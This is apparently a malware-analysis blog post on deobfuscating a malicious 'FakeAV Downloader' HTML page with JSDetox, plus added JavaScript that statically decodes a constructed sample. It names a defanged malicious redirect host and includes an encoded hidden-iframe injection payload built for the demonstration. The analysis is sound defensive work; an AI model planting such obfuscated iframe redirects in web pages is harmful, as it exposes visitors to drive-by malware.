After writing my last article about malware analysis for Android, I decided to check some threats that may come from web pages. Today we see more advertisements on the web than a few years ago. On malicious pages, the “advertisements” placed there will now more often try to steal your data by installing malware on your computer or by redirecting you to a web page containing exploit code for your browser (or its plugins).
I found a few nice examples of ‘web pages’ like this (again) on Mila’s great blog. Thanks again! ;)
(Hint: Don’t ask me for the password. Ask Mila via email.)
Let’s check the first one: an archive with an HTML file, named “FakeAV Downloader”.
2. First View
As you can see, the JS code prepares “eval()” and “fromCharCode()” for later use (with “n”):
3. Second View
While I was trying to figure out how to deobfuscate this code, I found a link to a very nice tool called JSDetox. You can install it on Kali, but if there is any problem with installation via “bundler”, try to install each package manually (gem). It should help.
After uploading our sample index.html to JSDetox, we can start deobfuscation (“Analyse”) and get the results in a few seconds:
Now we can see where the newly created <iframe> tag is trying to redirect us: the iframe page is located at hxxp://hivagdy.ru/count22.php.
Unfortunately, when I was checking this code, the RU hostname was unavailable.
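The same goal, recovering the hidden <iframe> target from a script that rebuilds its payload with “fromCharCode()” before passing it to “eval()”, can also be reached statically, without running the script. The following is an added example, not code from the analysed sample or from JSDetox. It assumes a constructed sample whose payload is stored as character codes shifted by a constant; the function names and the malicious.example URL are made up for illustration.

```javascript
// SAMPLE is constructed for this illustration; it is not the analysed index.html.
// It is only ever treated as text and is never executed.
const PAYLOAD = 'document.write("<iframe src=\'http://malicious.example/count.php\'' +
  ' width=1 height=1></iframe>")';
const SAMPLE = 'var n=[' + Array.from(PAYLOAD, c => c.charCodeAt(0) + 3).join(',') +
  '];var s="";for(var i=0;i<n.length;i++)s+=String.fromCharCode(n[i]-3);eval(s);';

// Collect numeric array literals long enough to hold an encoded payload.
function extractNumberArrays(source, minLen = 16) {
  const arrays = [];
  for (const m of source.matchAll(/\[\s*(\d+(?:\s*,\s*\d+)+)\s*\]/g)) {
    const nums = m[1].split(',').map(Number);
    if (nums.length >= minLen) arrays.push(nums);
  }
  return arrays;
}

// Try constant offsets; accept the first one that yields printable text
// containing script or HTML markers.
function decodeWithOffset(nums, maxOffset = 64) {
  for (let k = -maxOffset; k <= maxOffset; k++) {
    const shifted = nums.map(v => v - k);
    if (shifted.some(v => v < 32 || v > 126)) continue; // outside printable ASCII
    const text = String.fromCharCode(...shifted);
    if (/<iframe|document\.write|https?:\/\//i.test(text)) return { offset: k, text };
  }
  return null;
}

// Extract iframe targets and defang them (hxxp) so they are safe to paste in a report.
function iframeTargets(text) {
  const targets = [];
  for (const m of text.matchAll(/<iframe[^>]*\bsrc\s*=\s*['"]?([^'"\s>]+)/gi)) {
    targets.push(m[1].replace(/^http/i, 'hxxp'));
  }
  return targets;
}

function analyse(source) {
  const findings = [];
  for (const nums of extractNumberArrays(source)) {
    const decoded = decodeWithOffset(nums);
    if (decoded) findings.push({ ...decoded, iframes: iframeTargets(decoded.text) });
  }
  return findings;
}

console.log(JSON.stringify(analyse(SAMPLE), null, 2));
```

Because nothing is evaluated, this can be run on an analysis workstation against an untrusted file; a sample that uses a different encoding simply produces no findings.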
After that, I found some other interesting information, for example:
a) Correlation network topology
b) This host was used for: 
c) And one more piece of information:
So it now seems that we have all the information we need to decide that this index.html file (used in a phishing campaign, for example) can be very dangerous for the safety of our users/clients.
Again, big thanks for the sample files! ;)
If you have more, post the link(s) in the comments or send me an email with the subject “MALWARE”. Please remember to pack it with the password ‘infected’ (zip/rar/whatever). (Without the password, the email server will drop them.)
Materials described here:
 Mila’s blog – http://contagiodump.blogspot.com
 Android first steps in malware’s world - http://hauntit.blogspot.com/2015/01/pl-analiza-aplikacji.html
 JSDetox - https://github.com/svent/jsdetox
 Exposure ISEC Lab – http://exposure.iseclab.org
 Kali Linux – https://www.kali.org
 Malware URL – http://www.malwareurl.com
 PacketStormSecurity - PDF version